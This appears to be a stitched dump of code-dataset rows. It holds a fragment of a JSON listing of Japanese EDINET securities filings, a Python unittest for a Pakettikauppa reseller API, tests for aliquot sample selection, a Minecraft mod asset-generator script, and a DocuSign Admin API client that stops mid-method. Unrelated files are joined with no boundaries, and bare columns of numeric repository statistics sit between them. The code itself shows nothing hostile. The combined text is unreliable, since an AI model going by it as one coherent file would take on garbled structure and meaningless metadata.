"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 247,
"docID": "S100E35M",
"edinetCode": "E02350",
"secCode": "62660",
"JCN": "6260001018266",
"filerName": "タツモ株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "023001",
"docTypeCode": "040",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:54",
"docDescription": "訂正有価証券届出書(参照方式)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E1K1",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
},
{
"seqNumber": 248,
"docID": "S100E332",
"edinetCode": "E31774",
"secCode": null,
"JCN": "6140001011258",
"filerName": "明海興産株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "010002",
"docTypeCode": "350",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:57",
"docDescription": "変更報告書",
"issuerEdinetCode": "E04242",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 249,
"docID": "S100E34Z",
"edinetCode": "E31774",
"secCode": null,
"JCN": "6140001011258",
"filerName": "明海興産株式会社",
"fundCode": null,
"ordinanceCode": "060",
"formCode": "090001",
"docTypeCode": "360",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 16:59",
"docDescription": "訂正報告書(大量保有報告書・変更報告書)",
"issuerEdinetCode": "E04242",
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": "S100E21M",
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 250,
"docID": "S100E33W",
"edinetCode": "E05817",
"secCode": null,
"JCN": null,
"filerName": "マイクロソフトコーポレーション",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "102000",
"docTypeCode": "180",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 17:05",
"docDescription": "臨時報告書",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "0",
"pdfFlag": "1",
"attachDocFlag": "1",
"englishDocFlag": "0"
},
{
"seqNumber": 251,
"docID": "S100E36J",
"edinetCode": "E00395",
"secCode": "25030",
"JCN": "5010001034768",
"filerName": "キリンホールディングス株式会社",
"fundCode": null,
"ordinanceCode": "010",
"formCode": "170000",
"docTypeCode": "220",
"periodStart": null,
"periodEnd": null,
"submitDateTime": "2018-09-10 17:06",
"docDescription": "自己株券買付状況報告書(法24条の6第1項に基づくもの)",
"issuerEdinetCode": null,
"subjectEdinetCode": null,
"subsidiaryEdinetCode": null,
"currentReportReason": null,
"parentDocID": null,
"opeDateTime": null,
"withdrawalStatus": "0",
"docInfoEditStatus": "0",
"disclosureStatus": "0",
"xbrlFlag": "1",
"pdfFlag": "1",
"attachDocFlag": "0",
"englishDocFlag": "0"
}
]
}
"""
| 34.528407
| 94
| 0.453746
| 15,575
| 254,647
| 7.418941
| 0.084623
| 0.013137
| 0.017447
| 0.047789
| 0.896331
| 0.890576
| 0.887382
| 0.877092
| 0.876685
| 0.837438
| 0
| 0.110625
| 0.395355
| 254,647
| 7,374
| 95
| 34.533089
| 0.639484
| 0
| 0
| 0.783365
| 0
| 0
| 0.990626
| 0.06842
| 0
| 0
| 0
| 0
| 0.00068
| 1
| 0.000408
| false
| 0
| 0.001087
| 0
| 0.002039
| 0.000136
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
10f130922d82d8d8cd7471a02ba5cd201975b4ac
| 5,890
|
py
|
Python
|
tests/test_create_customer.py
|
vilkasgroup/Pakettikauppa
|
71545684d8516e95f933543fdd0cecc482824d28
|
[
"MIT"
] | null | null | null |
tests/test_create_customer.py
|
vilkasgroup/Pakettikauppa
|
71545684d8516e95f933543fdd0cecc482824d28
|
[
"MIT"
] | 24
|
2018-01-24T16:09:29.000Z
|
2022-01-01T19:32:10.000Z
|
tests/test_create_customer.py
|
vilkasgroup/Pakettikauppa
|
71545684d8516e95f933543fdd0cecc482824d28
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import logging
import unittest
# from unittest import TestCase
from pakettikauppa.reseller import PkReseller
logging.basicConfig(
level=logging.DEBUG,
)
class TestPkReseller(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._reseller = PkReseller(1)
cls.logger = logging.getLogger(__name__)
def tearDown(self):
"""
This method is called after each test
"""
pass
def test_empty_parameter(self):
with self.assertRaises(Exception) as e:
self._reseller.create_customer(**{})
# self.logger.debug("Exception message = {}".format(e.exception))
def test_too_short_parameter(self):
with self.assertRaises(KeyError) as e:
self._reseller.create_customer(**{
'name': 'Vilkas Group Oy Test',
})
# self.logger.debug("Exception message = {}".format(e.exception))
def test_invalid_key(self):
with self.assertRaises(KeyError) as e:
self._reseller.create_customer(**{
'name2': 'Vilkas Group Oy (Test)',
'business_id': '12345678-9',
'payment_service_provider': 'Invoice',
'psp_merchant_id': '',
'marketing_name': '',
'street_address': 'Finlaysoninkuja 19',
'post_office': 'Tampere',
'postcode': '33210',
'country': 'Finland',
'phone': '+35812345A5',
'email': 'tipi@vilkas.fi',
'contact_person_name': 'Porntip Härkönen',
'contact_person_phone': '0123456789',
'contact_person_email': 'tipi+test@vilkas.fi',
'customer_service_phone': '',
'customer_service_email': '',
})
# self.logger.debug("Exception message = {}".format(e.exception))
def test_missing_mandatory_field(self):
with self.assertRaises(ValueError) as e:
self._reseller.create_customer(**{
'name': 'Vilkas Group Oy (Test)',
'business_id': '12345678-9',
'payment_service_provider': None,
'psp_merchant_id': '',
'marketing_name': '',
'street_address': 'Finlaysoninkuja 19',
'post_office': 'Tampere',
'postcode': '33210',
'country': None,
'phone': '+35812345A5',
'email': 'tipi@vilkas.fi',
'contact_person_name': 'Porntip Härkönen',
'contact_person_phone': '0123456789',
'contact_person_email': 'tipi+test@vilkas.fi',
'customer_service_phone': '',
'customer_service_email': '',
})
# self.logger.debug("Exception message = {}".format(e.exception))
def test_invalid_payment_service_provider(self):
_req_data = {
'name': 'Vilkas Group Oy (Test)',
'business_id': '12345678-9',
'payment_service_provider': 'Invoice',
'psp_merchant_id': '',
'marketing_name': '',
'street_address': 'Finlaysoninkuja 19',
'post_office': 'Tampere',
'postcode': '33210',
'country': 'Finland',
'phone': '+35812345A5',
'email': 'tipi@vilkas.fi',
'contact_person_name': 'Porntip Härkönen',
'contact_person_phone': '0123456789',
'contact_person_email': 'tipi+test@vilkas.fi',
'customer_service_phone': '',
'customer_service_email': '',
}
# self.fail()
with self.assertRaises(ValueError) as e:
self._reseller.create_customer(**_req_data)
# self.logger.debug("Exception message = {}".format(e.exception))
def test_missing_checkout_id(self):
_req_data = {
'name': 'Vilkas Group Oy (Test)',
'business_id': '12345678-9',
'payment_service_provider': 'CHECKOUT',
'psp_merchant_id': '',
'marketing_name': '',
'street_address': 'Finlaysoninkuja 19',
'post_office': 'Tampere',
'postcode': '33210',
'country': 'Finland',
'phone': '+35812345A5',
'email': 'tipi@vilkas.fi',
'contact_person_name': 'Porntip Härkönen',
'contact_person_phone': '0123456789',
'contact_person_email': 'tipi+test@vilkas.fi',
'customer_service_phone': '',
'customer_service_email': '',
}
# self.fail()
with self.assertRaises(ValueError) as e:
self._reseller.create_customer(**_req_data)
# self.logger.debug("Exception message = {}".format(e.exception))
def test_create_customer(self):
_req_data = {
'name': 'Vilkas Group Oy (Test)',
'business_id': '12345678-9',
'payment_service_provider': '',
'psp_merchant_id': '',
'marketing_name': '',
'street_address': 'Finlaysoninkuja 19',
'post_office': 'Tampere',
'postcode': '33210',
'country': 'Finland',
'phone': '+35812345A5',
'email': 'tipi@vilkas.fi',
'contact_person_name': 'Porntip Härkönen',
'contact_person_phone': '0123456789',
'contact_person_email': 'tipi+test@vilkas.fi',
'customer_service_phone': '',
'customer_service_email': '',
}
res_data = self._reseller.create_customer(**_req_data)
customer_id = res_data['customer_id']
# self.logger.debug("Created customer id={}".format(customer_id))
self.assertIsNotNone(customer_id) and self.assertIsNot(customer_id, '')
if __name__ == '__main__':
unittest.main(verbosity=2)
| 37.75641
| 79
| 0.547878
| 539
| 5,890
| 5.699443
| 0.19295
| 0.063477
| 0.041016
| 0.059245
| 0.807943
| 0.794271
| 0.774089
| 0.774089
| 0.774089
| 0.774089
| 0
| 0.044417
| 0.315789
| 5,890
| 155
| 80
| 38
| 0.717866
| 0.095416
| 0
| 0.716535
| 0
| 0
| 0.351152
| 0.064224
| 0
| 0
| 0
| 0
| 0.055118
| 1
| 0.070866
| false
| 0.007874
| 0.023622
| 0
| 0.102362
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8008a6ccde5095ede1dccc158132adf4a2e896c3
| 4,762
|
py
|
Python
|
tests/test_selection.py
|
NCI-GDC/aliquot-level-maf
|
1b057aa3490386708224309ddd13dc40adad8ca2
|
[
"Apache-2.0"
] | 2
|
2020-03-16T15:00:47.000Z
|
2020-08-28T20:29:12.000Z
|
tests/test_selection.py
|
NCI-GDC/aliquot-level-maf
|
1b057aa3490386708224309ddd13dc40adad8ca2
|
[
"Apache-2.0"
] | 2
|
2020-03-17T20:41:03.000Z
|
2020-08-26T21:03:35.000Z
|
tests/test_selection.py
|
NCI-GDC/aliquot-level-maf
|
1b057aa3490386708224309ddd13dc40adad8ca2
|
[
"Apache-2.0"
] | 1
|
2020-08-14T08:49:03.000Z
|
2020-08-14T08:49:03.000Z
|
from datetime import datetime
from aliquot_level_maf.selection import (
PrimaryAliquotSelectionCriterion,
select_primary_aliquots,
SampleCriterion,
PrimaryAliquot,
)
def test_select_primary_aliquots__selects_correct_sample_type():
criteria = [
PrimaryAliquotSelectionCriterion(
id="1",
samples=[
SampleCriterion(id="sample_1", sample_type="Ectoplasm",),
SampleCriterion(id="sample_2", sample_type="Muslin"),
],
entity_id="case_1",
maf_creation_date=datetime(2020, 1, 1),
),
PrimaryAliquotSelectionCriterion(
id="2",
samples=[
SampleCriterion(id="sample_3", sample_type="Primary Tumor",),
SampleCriterion(id="sample_4", sample_type="Blood Derived Normal",),
],
entity_id="case_1",
maf_creation_date=datetime(2020, 1, 1),
),
PrimaryAliquotSelectionCriterion(
id="3",
samples=[
SampleCriterion(id="sample_5", sample_type="Unknown",),
SampleCriterion(id="sample_6", sample_type="Recurrent Tumor",),
],
entity_id="case_1",
maf_creation_date=datetime(2020, 1, 1),
),
]
results = select_primary_aliquots(criteria)
assert results["case_1"] == PrimaryAliquot(id="2", sample_id="sample_3")
def test_select_primary_aliquots__uses_maf_creation_date_to_break_tie():
criteria = [
PrimaryAliquotSelectionCriterion(
id="1",
samples=[
SampleCriterion(id="sample_a", sample_type="Primary Tumor",),
SampleCriterion(id="sample_b", sample_type="Blood Derived Normal"),
],
entity_id="case_1",
maf_creation_date=datetime(2020, 1, 1),
),
PrimaryAliquotSelectionCriterion(
id="2",
samples=[
SampleCriterion(id="sample_d", sample_type="Primary Tumor",),
SampleCriterion(id="sample_e", sample_type="Blood Derived Normal"),
],
entity_id="case_1",
maf_creation_date=datetime(2020, 1, 2),
),
]
results = select_primary_aliquots(criteria)
assert results["case_1"] == PrimaryAliquot(id="1", sample_id="sample_a")
def test_select_primary_aliquots__uses_maf_uuid_to_break_tie():
criteria = [
PrimaryAliquotSelectionCriterion(
id="1",
samples=[
SampleCriterion(id="sample_a", sample_type="Primary Tumor",),
SampleCriterion(id="sample_b", sample_type="Blood Derived Normal"),
],
entity_id="case_1",
maf_creation_date=datetime(2020, 1, 1),
),
PrimaryAliquotSelectionCriterion(
id="2",
samples=[
SampleCriterion(id="sample_d", sample_type="Primary Tumor",),
SampleCriterion(id="sample_e", sample_type="Blood Derived Normal"),
],
entity_id="case_1",
maf_creation_date=datetime(2020, 1, 1),
),
]
results = select_primary_aliquots(criteria)
assert results["case_1"] == PrimaryAliquot(id="1", sample_id="sample_a")
def test_select_primary_aliquots__handles_multiple_cases():
criteria = [
PrimaryAliquotSelectionCriterion(
id="1",
samples=[
SampleCriterion(id="sample_1", sample_type="Ectoplasm",),
SampleCriterion(id="sample_2", sample_type="Muslin"),
],
entity_id="case_1",
maf_creation_date=datetime(2020, 1, 1),
),
PrimaryAliquotSelectionCriterion(
id="2",
samples=[
SampleCriterion(id="sample_3", sample_type="Primary Tumor",),
SampleCriterion(id="sample_4", sample_type="Blood Derived Normal",),
],
entity_id="case_1",
maf_creation_date=datetime(2020, 1, 1),
),
PrimaryAliquotSelectionCriterion(
id="3",
samples=[
SampleCriterion(id="sample_5", sample_type="Unknown",),
SampleCriterion(id="sample_6", sample_type="Recurrent Tumor",),
],
entity_id="case_2",
maf_creation_date=datetime(2020, 1, 1),
),
]
results = select_primary_aliquots(criteria)
assert results["case_1"] == PrimaryAliquot(id="2", sample_id="sample_3")
assert results["case_2"] == PrimaryAliquot(id="3", sample_id="sample_6")
def test_select_primary_aliquots__no_criteria():
results = select_primary_aliquots([])
assert len(results.items()) == 0
| 34.759124
| 84
| 0.584838
| 461
| 4,762
| 5.713666
| 0.127983
| 0.07593
| 0.174639
| 0.113895
| 0.88079
| 0.859529
| 0.859529
| 0.843584
| 0.843584
| 0.843584
| 0
| 0.031718
| 0.298194
| 4,762
| 136
| 85
| 35.014706
| 0.756433
| 0
| 0
| 0.826446
| 0
| 0
| 0.121168
| 0
| 0
| 0
| 0
| 0
| 0.049587
| 1
| 0.041322
| false
| 0
| 0.016529
| 0
| 0.057851
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
33ed952f40e128538402f0f65b4aa575d58a8f9b
| 3,288
|
py
|
Python
|
src/main/resources/asset_helper.py
|
Archydra-Studios/Primeval
|
339bdd7d82869ea014ca64e55f5636d95ad1e0b0
|
[
"MIT"
] | 9
|
2021-12-12T00:10:16.000Z
|
2022-03-26T16:29:40.000Z
|
src/main/resources/asset_helper.py
|
Archydra-Studios/Primeval
|
339bdd7d82869ea014ca64e55f5636d95ad1e0b0
|
[
"MIT"
] | 22
|
2022-03-28T20:58:26.000Z
|
2022-03-30T20:03:49.000Z
|
src/main/resources/asset_helper.py
|
devs-immortal/Primeval
|
339bdd7d82869ea014ca64e55f5636d95ad1e0b0
|
[
"MIT"
] | null | null | null |
import os
MOD_ID = "primeval"
def get_asset_path():
return (os.getcwd()+"/assets/")
def generate_standard_block(block_id):
blockstate_file = open(get_asset_path()+MOD_ID+"/blockstates/"+block_id+".json", "w")
block_model_file = open(get_asset_path()+MOD_ID+"/models/block/"+block_id+".json", "w")
item_model_file = open(get_asset_path()+MOD_ID+"/models/item/"+block_id+".json", "w")
blockstate_file.write("{\n\t\"variants\": {\n\t\t\"\": {\n\t\t\t\"model\": \""+MOD_ID+":block/"+block_id+"\"\n\t\t}\n\t}\n}")
block_model_file.write("{\n\t\"parent\": \"minecraft:block/cube_all\",\n\t\"textures\": {\n\t\t\"all\": \""+MOD_ID+":block/"+block_id+"\"\n\t}\n}")
item_model_file.write("{\n\t\"parent\": \""+MOD_ID+":block/"+block_id+"\"\n}")
blockstate_file.close()
block_model_file.close()
item_model_file.close()
def generate_standard_item(item_id):
item_model_file = open(get_asset_path()+MOD_ID+"/models/item/"+item_id+".json", "w")
item_model_file.write("{\n\t\"parent\": \"minecraft:item/generated\",\n\t\"textures\": {\n\t\t\"layer0\": \""+MOD_ID+":item/"+item_id+"\"\n\t}\n}")
item_model_file.close()
def generate_handheld_item(item_id):
item_model_file = open(get_asset_path()+MOD_ID+"/models/item/"+item_id+".json", "w")
item_model_file.write("{\n\t\"parent\": \"minecraft:item/handheld\",\n\t\"textures\": {\n\t\t\"layer0\": \""+MOD_ID+":item/"+item_id+"\"\n\t}\n}")
item_model_file.close()
def generate_log_block(block_id):
blockstate_file = open(get_asset_path()+MOD_ID+"/blockstates/"+block_id+".json", "w")
block_model_file = open(get_asset_path()+MOD_ID+"/models/block/"+block_id+".json", "w")
horizontal_block_model_file = open(get_asset_path()+MOD_ID+"/models/block/"+block_id+"_horizontal.json", "w")
item_model_file = open(get_asset_path()+MOD_ID+"/models/item/"+block_id+".json", "w")
blockstate_file.write("{\n\t\"variants\": {\n\t\t\"axis=x\": {\n\t\t\t\"model\": \""+MOD_ID+":block/"+block_id+"_horizontal\",\n\t\t\t\"x\": 90,\n\t\t\t\"y\": 90\n\t\t},\n\t\t\"axis=y\": {\n\t\t\t\"model\": \""+MOD_ID+":block/"+block_id+"\"\n\t\t},\n\t\t\"axis=z\": {\n\t\t\t\"model\": \""+MOD_ID+":block/"+block_id+"_horizontal\",\n\t\t\t\"x\": 90\n\t\t}\n\t}\n}")
block_model_file.write("{\n\t\"parent\": \"minecraft:block/cube_column\",\n\t\"textures\": {\n\t\t\"end\": \""+MOD_ID+":block/"+block_id+"_top\",\n\t\t\"side\": \""+MOD_ID+":block/"+block_id+"\"\n\t}\n}")
horizontal_block_model_file.write("{\n\t\"parent\": \"minecraft:block/cube_column_horizontal\",\n\t\"textures\": {\n\t\t\"end\": \""+MOD_ID+":block/"+block_id+"_top\",\n\t\t\"side\":\""+MOD_ID+":block/"+block_id+"\"\n\t}\n}")
item_model_file.write("{\n\t\"parent\": \""+MOD_ID+":block/"+block_id+"\"\n}")
blockstate_file.close()
block_model_file.close()
item_model_file.close()
def create_ore_set(ore_type):
generate_standard_block(ore_type+"_ore_small")
generate_standard_item("raw_"+ore_type+"_small")
generate_standard_block(ore_type+"_ore_medium")
generate_standard_item("raw_"+ore_type+"_medium")
generate_standard_block(ore_type+"_ore_large")
generate_standard_item("raw_"+ore_type+"_large")
create_ore_set("copper_malachite")
| 59.781818
| 369
| 0.645377
| 537
| 3,288
| 3.635009
| 0.108007
| 0.044057
| 0.033811
| 0.084529
| 0.875
| 0.875
| 0.769467
| 0.761783
| 0.761783
| 0.761783
| 0
| 0.002672
| 0.089416
| 3,288
| 55
| 370
| 59.781818
| 0.649299
| 0
| 0
| 0.428571
| 1
| 0
| 0.282761
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.02381
| 0.02381
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d3f37e9e9ed510a2d190cba04cd263c28c57a87
| 58,716
|
py
|
Python
|
docusign_admin/apis/users_api.py
|
docusign/docusign-admin-python-client
|
1b94d311e3203e99717f7e67446083ea4b399ea9
|
[
"MIT"
] | 1
|
2021-11-14T17:01:17.000Z
|
2021-11-14T17:01:17.000Z
|
docusign_admin/apis/users_api.py
|
docusign/docusign-admin-python-client
|
1b94d311e3203e99717f7e67446083ea4b399ea9
|
[
"MIT"
] | null | null | null |
docusign_admin/apis/users_api.py
|
docusign/docusign-admin-python-client
|
1b94d311e3203e99717f7e67446083ea4b399ea9
|
[
"MIT"
] | 1
|
2021-11-14T17:01:11.000Z
|
2021-11-14T17:01:11.000Z
|
# coding: utf-8
"""
DocuSign Admin API
An API for an organization administrator to manage organizations, accounts and users # noqa: E501
OpenAPI spec version: v2.1
Contact: devcenter@docusign.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..client.configuration import Configuration
from ..client.api_client import ApiClient
class UsersApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def activate_membership(self, organization_id, user_id, membership_id, request, **kwargs):
"""
Activates user memberships
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.activate_membership(organization_id, user_id, membership_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param str user_id: The user ID Guid (required)
:param str membership_id: The membership ID Guid (required)
:param ForceActivateMembershipRequest request: Additional details about the user's membership (required)
:return: UpdateResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.activate_membership_with_http_info(organization_id, user_id, membership_id, request, **kwargs)
else:
(data) = self.activate_membership_with_http_info(organization_id, user_id, membership_id, request, **kwargs)
return data
def activate_membership_with_http_info(self, organization_id, user_id, membership_id, request, **kwargs):
"""
Activates user memberships
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.activate_membership_with_http_info(organization_id, user_id, membership_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param str user_id: The user ID Guid (required)
:param str membership_id: The membership ID Guid (required)
:param ForceActivateMembershipRequest request: Additional details about the user's membership (required)
:return: UpdateResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization_id', 'user_id', 'membership_id', 'request']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method activate_membership" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in params) or (params['organization_id'] is None):
raise ValueError("Missing the required parameter `organization_id` when calling `activate_membership`")
# verify the required parameter 'user_id' is set
if ('user_id' not in params) or (params['user_id'] is None):
raise ValueError("Missing the required parameter `user_id` when calling `activate_membership`")
# verify the required parameter 'membership_id' is set
if ('membership_id' not in params) or (params['membership_id'] is None):
raise ValueError("Missing the required parameter `membership_id` when calling `activate_membership`")
# verify the required parameter 'request' is set
if ('request' not in params) or (params['request'] is None):
raise ValueError("Missing the required parameter `request` when calling `activate_membership`")
collection_formats = {}
resource_path = '/v2/organizations/{organizationId}/users/{userId}/memberships/{membershipId}'.replace('{format}', 'json')
path_params = {}
if 'organization_id' in params:
path_params['organizationId'] = params['organization_id']
if 'user_id' in params:
path_params['userId'] = params['user_id']
if 'membership_id' in params:
path_params['membershipId'] = params['membership_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'request' in params:
body_params = params['request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UpdateResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_or_update_user(self, organization_id, account_id, request, **kwargs):
"""
Creates and updates a multi-product user
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_or_update_user(organization_id, account_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID GUID (required)
:param str account_id: The account ID GUID (required)
:param NewMultiProductUserAddRequest request: The request object (required)
:return: AddUserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_or_update_user_with_http_info(organization_id, account_id, request, **kwargs)
else:
(data) = self.add_or_update_user_with_http_info(organization_id, account_id, request, **kwargs)
return data
def add_or_update_user_with_http_info(self, organization_id, account_id, request, **kwargs):
"""
Creates and updates a multi-product user
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_or_update_user_with_http_info(organization_id, account_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID GUID (required)
:param str account_id: The account ID GUID (required)
:param NewMultiProductUserAddRequest request: The request object (required)
:return: AddUserResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization_id', 'account_id', 'request']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_or_update_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in params) or (params['organization_id'] is None):
raise ValueError("Missing the required parameter `organization_id` when calling `add_or_update_user`")
# verify the required parameter 'account_id' is set
if ('account_id' not in params) or (params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `add_or_update_user`")
# verify the required parameter 'request' is set
if ('request' not in params) or (params['request'] is None):
raise ValueError("Missing the required parameter `request` when calling `add_or_update_user`")
collection_formats = {}
resource_path = '/v2.1/organizations/{organizationId}/accounts/{accountId}/users'.replace('{format}', 'json')
path_params = {}
if 'organization_id' in params:
path_params['organizationId'] = params['organization_id']
if 'account_id' in params:
path_params['accountId'] = params['account_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'request' in params:
body_params = params['request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AddUserResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_users(self, organization_id, account_id, request, **kwargs):
"""
Adds users to an account.
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_users(organization_id, account_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param str account_id: The account ID Guid (required)
:param NewAccountUserRequest request: The details for the users to add to the account (required)
:return: NewUserResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_users_with_http_info(organization_id, account_id, request, **kwargs)
else:
(data) = self.add_users_with_http_info(organization_id, account_id, request, **kwargs)
return data
def add_users_with_http_info(self, organization_id, account_id, request, **kwargs):
"""
Adds users to an account.
Required scopes: user_write
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_users_with_http_info(organization_id, account_id, request, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: The organization ID Guid (required)
:param str account_id: The account ID Guid (required)
:param NewAccountUserRequest request: The details for the users to add to the account (required)
:return: NewUserResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization_id', 'account_id', 'request']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_users" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in params) or (params['organization_id'] is None):
